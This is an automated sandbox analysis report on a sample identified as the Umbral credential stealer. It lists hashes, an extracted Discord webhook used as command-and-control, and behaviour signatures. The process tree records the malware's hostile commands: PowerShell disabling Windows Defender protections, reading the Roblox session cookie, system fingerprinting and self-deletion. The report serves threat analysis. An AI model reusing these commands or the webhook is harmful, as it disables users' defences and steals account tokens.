Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

resembleC2.exe

windows7-x64

10

resembleC2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    12/01/2025, 06:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    resembleC2.exe

  • Size

    128KB

  • MD5

    4c8044c83f60465eae3cc16d7c858085

  • SHA1

    bc837ba36a8f244283483210215a11607f05fb63

  • SHA256

    331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8

  • SHA512

    f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432

  • SSDEEP

    3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\resembleC2.exe
    "C:\Users\Admin\AppData\Local\Temp\resembleC2.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
      "C:\Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2600
    • C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\resemble.py
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2976
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\resemble.py"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:2168
    • C:\Users\Admin\AppData\Local\Temp\MoonHub.exe
      "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1388
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe"
        3⤵
        • Views/modifies file attributes
        PID:556
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonHub.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1784
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2420
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1788
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2624
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:1556
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2300
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\MoonHub.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2628
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:524

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\MoonHub.exe
        Filesize

        231KB

        MD5

        f70b5e56a09af292d4e909c547f9c8c0

        SHA1

        577883bdbe8dc9582e15e7a1212b1fe432bafce3

        SHA256

        8fd22c5acb3144dbaa5ab3f9dd5901eb6f3beef67e72ea431246c6a790c067de

        SHA512

        e54ccb56aa6473abd3530493933d5164f2dff02076e0f03443382f02d177a52e318d8d0f432e6a3fb5620eaffd09f2dbf6ccbf9698ba149b149c594fa162d879

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\resemble.py
        Filesize

        27KB

        MD5

        23f1fabaef532d89fcb6d5bb14a36ef3

        SHA1

        679a82ed172d49f298bf07b6fa0de9b6c2ce0046

        SHA256

        e4410bc67b1ee8af2df456713b85040917b8cf749fb7d660feeb625b25ec9c51

        SHA512

        96e2baa6ce0220b9ad167b60220c683d5b080a9ba9a2e4d320aae6989f4aa2d241f8078e69bdd2da39a20d9b57ae84240da912d29e5e1db36cc90cf6a0537458

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
        Filesize

        3KB

        MD5

        bfa21b8f3a06e006ef7a289045535286

        SHA1

        0598506c45c41058ab867a77492738cf8e547cd6

        SHA256

        afd0d1a3c0d214dcc99a11476dbac7b4bb7d1087199de4f326b2f1dbd0725848

        SHA512

        a5c9e79f6b9f640184fe97fc8353f9dff0b145baa863b31c7e7fb942849eed87b14403dae865a3bd40b09dd8c35335970ccb4c0f8a99af9347db867658f7c5f5

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        6b56d190714cd19f656cc4b28e9694fb

        SHA1

        dd5c4a8c217f40b42f108dd6ae2033a20fdfb090

        SHA256

        cf64f66cbf402e91bee86f1e23fca52e4d5b295dc7e24bc8982a863657fc6534

        SHA512

        1680068a38e56e6bedce08c4462d6f505e7b338510d73de98e5078111dac03cf240561da33387417bea52873aa9052ccbb5472d3f3c00a8a7d880f90ff767187

        Download Submit

      • \Users\Admin\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
        Filesize

        45KB

        MD5

        8c7d2f0a936dbe6d0899d40171ffb668

        SHA1

        0b22fcd904f3b0fa2555a32a2635423668fc4616

        SHA256

        85f5f5acb54c30efd4f84c0f11c834b7dab98c5bb7357bddcd29fbe5babc4db6

        SHA512

        463a48ec2752fd002e82dfe555abd03fc666a523da99e0e848788eeff6f98d06d36a360cfd7ad70d342bb4c90a49131a3428f1404d17e04a7fe5a1022c1faa65

        Download Submit

      • memory/1556-80-0x000000001B140000-0x000000001B422000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1784-30-0x000000001B330000-0x000000001B612000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1784-31-0x0000000001F60000-0x0000000001F68000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2464-15-0x0000000000980000-0x00000000009C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2568-16-0x000007FEF5650000-0x000007FEF603C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2568-0-0x000007FEF5653000-0x000007FEF5654000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2568-1-0x0000000000AC0000-0x0000000000AE6000-memory.dmp

        Filesize

        152KB

        Download

      • memory/2600-17-0x000007FEF5650000-0x000007FEF603C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2600-67-0x000007FEF5650000-0x000007FEF603C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2600-11-0x000000013F130000-0x000000013F140000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2892-23-0x000000001B200000-0x000000001B4E2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2892-24-0x0000000002560000-0x0000000002568000-memory.dmp

        Filesize

        32KB

        Download